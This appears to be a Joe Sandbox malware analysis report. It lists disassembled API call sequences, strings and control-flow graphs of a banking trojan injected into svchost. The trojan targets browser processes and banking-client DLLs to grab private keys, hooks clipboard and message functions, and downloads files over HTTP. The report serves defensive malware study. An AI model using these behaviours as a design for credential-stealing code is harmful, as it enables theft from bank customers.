                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026579D0,00000000,00000000,00000000), ref: 02656F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656F7C
                                                                                                                                                                                                                • Part of subcall function 02646DE0: memset.MSVCRT ref: 02646E00
                                                                                                                                                                                                                • Part of subcall function 02646DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02646E1C
                                                                                                                                                                                                                • Part of subcall function 02646DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02646E78
                                                                                                                                                                                                                • Part of subcall function 02646DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02646EA0
                                                                                                                                                                                                                • Part of subcall function 02646DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02646EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02656970,00000000,00000000,00000000), ref: 02656F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026554B0,00000000,00000000,00000000), ref: 02656FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656FF0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02657013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02657023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02657047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02657059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02657065
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02657074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02657090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 026570B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 026570CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 026570E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 026570F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 0265710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02657125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 0265713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02657151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02657167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 0265717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02657193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 026571A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 026571BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 026571D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 026571EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B8F0,00000000,00000000,00000000), ref: 02657219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265EF80,00000000,00000000,00000000), ref: 02657255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660560,00000000,00000000,00000000), ref: 0265728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026572AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660E20,00000000,00000000,00000000), ref: 026572C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026572D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026572E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265F6A0,00000000,00000000,00000000), ref: 026572F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265CB80,00000000,00000000,00000000), ref: 0265732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265CC20,00000000,00000000,00000000), ref: 02657363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02661590,00000000,00000000,00000000), ref: 02657399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026573AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026573BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026624D0,00000000,00000000,00000000), ref: 026573CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026573E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026573F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026631C0,00000000,00000000,00000000), ref: 02657405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026632B0,00000000,00000000,00000000), ref: 0265743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265FE80,00000000,00000000,00000000), ref: 02657471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657492
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663480,00000000,00000000,00000000), ref: 026574A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026574BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026574C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026643F0,00000000,00000000,00000000), ref: 026574DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026574F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026574FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026647D0,00000000,00000000,00000000), ref: 02657513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657534
                                                                                                                                                                                                                • Part of subcall function 02655720: memset.MSVCRT ref: 02655741
                                                                                                                                                                                                                • Part of subcall function 02655720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02655757
                                                                                                                                                                                                                • Part of subcall function 02655720: AddVectoredExceptionHandler.KERNEL32(00000001,02643A20), ref: 02655764
                                                                                                                                                                                                                • Part of subcall function 02655720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0265577F
                                                                                                                                                                                                                • Part of subcall function 02655720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02655799
                                                                                                                                                                                                                • Part of subcall function 02655720: GetHandleInformation.KERNEL32(00000000,?), ref: 026557B1
                                                                                                                                                                                                                • Part of subcall function 02655720: CloseHandle.KERNEL32(00000000), ref: 026557C2
                                                                                                                                                                                                                • Part of subcall function 02655720: InitializeCriticalSection.KERNEL32(0268FB50), ref: 026557D3
                                                                                                                                                                                                                • Part of subcall function 02655720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 026557E9
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 026557FB
                                                                                                                                                                                                                • Part of subcall function 02655720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265581A
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02655828
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02655844
                                                                                                                                                                                                                • Part of subcall function 02655720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02655860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026619A0,00000000,00000000,00000000), ref: 02657549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02661C80,00000000,00000000,00000000), ref: 0265757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02657593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026575A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026480C0,00000000,00000000,00000000), ref: 026575B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026575CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026575E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 026575FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02657613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02657625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02657637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02657649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 0265765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 0265766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 0265767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 026576EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 026576FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02657714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 0265771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 02657731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0264BC50,00000000,00000000,00000000), ref: 02657745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02657783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0265779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026577AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSectionUser$AdminBackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$75775923a$75775A6Fa$75775d6fa$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3526539773-2913021656
                                                                                                                                                                                                              • Opcode ID: 5a3111f6b1d7c09c66be338950b423c18d3ddb5a1b6498044bbc452a07394121
                                                                                                                                                                                                              • Instruction ID: c8bacad36c25e28326912b37b8ed133b6e935c4d3237705de67a742c2f8d1152
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a3111f6b1d7c09c66be338950b423c18d3ddb5a1b6498044bbc452a07394121
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7062CB71E81329B6FB21D7A4CD45FAEBBAC5F04B44F604644FE05B62C0DBB0DA418AA5
                                                                                                                                                                                                              Function 02655720 Relevance: 114.1, APIs: 43, Strings: 22, Instructions: 302libraryloaderthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 295 2655720-26557a3 memset GetModuleFileNameA AddVectoredExceptionHandler CreateMutexA CreateThread 296 26557a5-26557b9 GetHandleInformation 295->296 297 26557c8-26557f3 InitializeCriticalSection call 2652570 LoadLibraryExA 295->297 296->297 299 26557bb-26557bf 296->299 302 26557f5-26557ff GetProcAddress 297->302 303 2655811-2655820 LoadLibraryExA 297->303 299->297 301 26557c1-26557c2 CloseHandle 299->301 301->297 302->303 304 2655801-265580c call 265a540 302->304 305 2655876-265588a InitializeCriticalSection GetModuleHandleA 303->305 306 2655822-265582c GetProcAddress 303->306 304->303 307 265588c-2655896 GetProcAddress 305->307 308 26558a8-26558c1 GetCurrentProcessId call 2664880 305->308 306->305 310 265582e-2655848 call 265a540 GetProcAddress 306->310 307->308 311 2655898-26558a3 call 265a540 307->311 317 26558c3-26558e3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 308->317 318 2655902-2655913 LoadLibraryExA 308->318 310->305 319 265584a-2655864 call 265a540 GetProcAddress 310->319 311->308 317->318 320 26558e5-26558f9 lstrcmpiA 317->320 322 2655915-265591f GetProcAddress 318->322 323 2655931-2655937 GetCurrentProcessId call 2664880 318->323 319->305 330 2655866-2655871 call 265a540 319->330 320->318 325 26558fb-2655900 call 2648560 320->325 322->323 327 2655921-265592c call 265a540 322->327 328 265593c-265593e 323->328 325->323 327->323 332 2655940-2655960 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 328->332 333 265597c-2655980 328->333 330->305 332->333 336 2655962-2655976 lstrcmpiA 332->336 337 2655ae7-2655aed 333->337 338 2655986-26559a6 call 2659820 call 2641660 StrStrIA 333->338 336->333 336->337 343 26559be-26559ce StrStrIA 338->343 344 26559a8-26559b8 StrStrIA 338->344 343->337 345 26559d4-26559e7 LoadLibraryExA 343->345 344->337 344->343 346 2655a3d-2655a73 InitializeCriticalSection call 2651900 call 2651190 call 264ff90 LoadLibraryExA 345->346 347 26559e9-26559f3 GetProcAddress 345->347 362 2655a75-2655a7f GetProcAddress 346->362 363 2655a91-2655a9e LoadLibraryExA 346->363 349 2655a05-2655a0f GetProcAddress 347->349 350 26559f5-2655a00 call 265a540 347->350 352 2655a21-2655a2b GetProcAddress 349->352 353 2655a11-2655a1c call 265a540 349->353 350->349 352->346 356 2655a2d-2655a38 call 265a540 352->356 353->352 356->346 362->363 366 2655a81-2655a8c call 265a540 362->366 364 2655aa0-2655aaa GetProcAddress 363->364 365 2655abc-2655ac9 LoadLibraryExA 363->365 364->365 368 2655aac-2655ab7 call 265a540 364->368 365->337 369 2655acb-2655ad5 GetProcAddress 365->369 366->363 368->365 369->337 371 2655ad7-2655ae2 call 265a540 369->371 371->337
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02655741
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02655757
                                                                                                                                                                                                              • AddVectoredExceptionHandler.KERNEL32(00000001,02643A20), ref: 02655764
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0265577F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02655799
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026557B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026557C2
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB50), ref: 026557D3
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 026557E9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 026557FB
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265581A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02655828
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02655844
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02655860
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB38), ref: 0265587B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02655882
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02655892
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,026479E0,02699E88), ref: 026558A8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 026558C3
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 026558D8
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 026558DF
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 026558F1
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 0265590B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 0265591B
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,0264BB50,0268EB74), ref: 02655931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02655940
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02655955
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 0265595C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 0265596E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 026559A2
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 026559B4
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 026559CA
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 026559E1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 026559EF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02655A0B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02655A27
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB20), ref: 02655A42
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02655A6F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02655A7B
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02655A9A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02655AA6
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02655AC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02655AD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                              • String ID: .exe$75775d6fa$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1248150503-270038200
                                                                                                                                                                                                              • Opcode ID: 28641a7918a25ec63985f1ee5495eba97b63afb089833f3db4ff431baaa5b6f7
                                                                                                                                                                                                              • Instruction ID: dca5d11db796a4a0b9cc7d8c0307223bdec7dfbcd39a2cfdaed9eb075d7dc651
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28641a7918a25ec63985f1ee5495eba97b63afb089833f3db4ff431baaa5b6f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00918E71BC1325B6FB2076B19C8AF6E375C5F04B44F950615BD43F6280EFA4E9808A79
                                                                                                                                                                                                              Function 02654AB0 Relevance: 100.2, APIs: 48, Strings: 9, Instructions: 421memorynetworkfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 373 2654ab0-2654afd memset 374 2654f75-2654f7d 373->374 375 2654b03-2654b06 373->375 375->374 376 2654b0c-2654b0f 375->376 377 2654b15-2654b1c 376->377 378 2654bb0-2654bcd InternetOpenA 376->378 381 2654b1e-2654b38 GetProcessHeap HeapAlloc 377->381 382 2654b49-2654b4e 377->382 379 2654bd3-2654bec InternetConnectA 378->379 380 2654f1a 378->380 379->380 384 2654bf2-2654bfc 379->384 385 2654f20-2654f25 380->385 386 2654b46 381->386 387 2654b3a-2654b43 memset 381->387 382->374 383 2654b54-2654b6f memcpy 382->383 388 2654b70-2654b7e 383->388 389 2654c03-2654c24 HttpOpenRequestA 384->389 390 2654bfe 384->390 391 2654f27-2654f35 GetProcessHeap HeapValidate 385->391 392 2654f43-2654f4d 385->392 386->382 387->386 388->388 395 2654b80 388->395 389->380 396 2654c2a-2654c33 389->396 390->389 391->392 397 2654f37-2654f3d GetProcessHeap HeapFree 391->397 393 2654f55-2654f5a 392->393 394 2654f4f-2654f53 InternetCloseHandle 392->394 398 2654f5c-2654f5d InternetCloseHandle 393->398 399 2654f5f-2654f64 393->399 394->393 400 2654b82-2654b93 395->400 401 2654c35-2654c39 396->401 402 2654c4e 396->402 397->392 398->399 405 2654f66-2654f67 InternetCloseHandle 399->405 406 2654f69-2654f72 399->406 407 2654b95 400->407 408 2654b97-2654b9e 400->408 401->402 403 2654c3b-2654c4c HttpAddRequestHeadersA 401->403 404 2654c51-2654c64 HttpAddRequestHeadersA 402->404 403->404 409 2654c96-2654c9b 404->409 410 2654c66-2654c94 _snprintf HttpAddRequestHeadersA 404->410 405->406 407->408 408->400 411 2654ba0-2654bab call 2658160 408->411 412 2654ca0-2654cb2 HttpSendRequestA 409->412 413 2654c9d 409->413 410->409 411->378 412->380 415 2654cb8-2654cd5 HttpQueryInfoA 412->415 413->412 415->380 416 2654cdb-2654ce2 415->416 416->380 417 2654ce8-2654d10 CreateFileA 416->417 417->380 418 2654d16-2654d1d call 2665930 417->418 421 2654d76-2654d90 GetProcessHeap RtlAllocateHeap 418->421 422 2654d1f-2654d34 ConvertStringSecurityDescriptorToSecurityDescriptorW 418->422 423 2654d96-2654dc3 memset InternetReadFile 421->423 424 2654e5a-2654e5c 421->424 422->421 425 2654d36-2654d55 GetSecurityDescriptorSacl 422->425 426 2654dc5-2654dca 423->426 427 2654e3e-2654e4c GetProcessHeap HeapValidate 423->427 428 2654e81-2654e95 call 26474a0 424->428 429 2654e5e-2654e72 GetHandleInformation 424->429 430 2654d57-2654d66 SetNamedSecurityInfoA 425->430 431 2654d6c-2654d70 LocalFree 425->431 426->427 432 2654dcc-2654e23 SetFilePointer LockFile WriteFile UnlockFile GetProcessHeap HeapValidate 426->432 427->424 433 2654e4e-2654e54 GetProcessHeap HeapFree 427->433 428->385 439 2654e9b-2654ea5 428->439 429->428 434 2654e74-2654e78 429->434 430->431 431->421 432->421 436 2654e29-2654e39 GetProcessHeap HeapFree 432->436 433->424 434->428 437 2654e7a-2654e7b CloseHandle 434->437 436->421 437->428 440 2654eb0-2654ebe 439->440 440->440 441 2654ec0 440->441 442 2654ec2-2654ed3 441->442 443 2654ed5 442->443 444 2654ed7-2654ede 442->444 443->444 444->442 445 2654ee0-2654f0a call 2658160 call 2647350 GetProcessHeap HeapValidate 444->445 445->385 450 2654f0c-2654f18 GetProcessHeap RtlFreeHeap 445->450 450->385
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02654B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654B2E
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654B3E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02654B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02654BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02654BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02654C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02654C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02654C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02654C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02654C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02654CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02654CCD
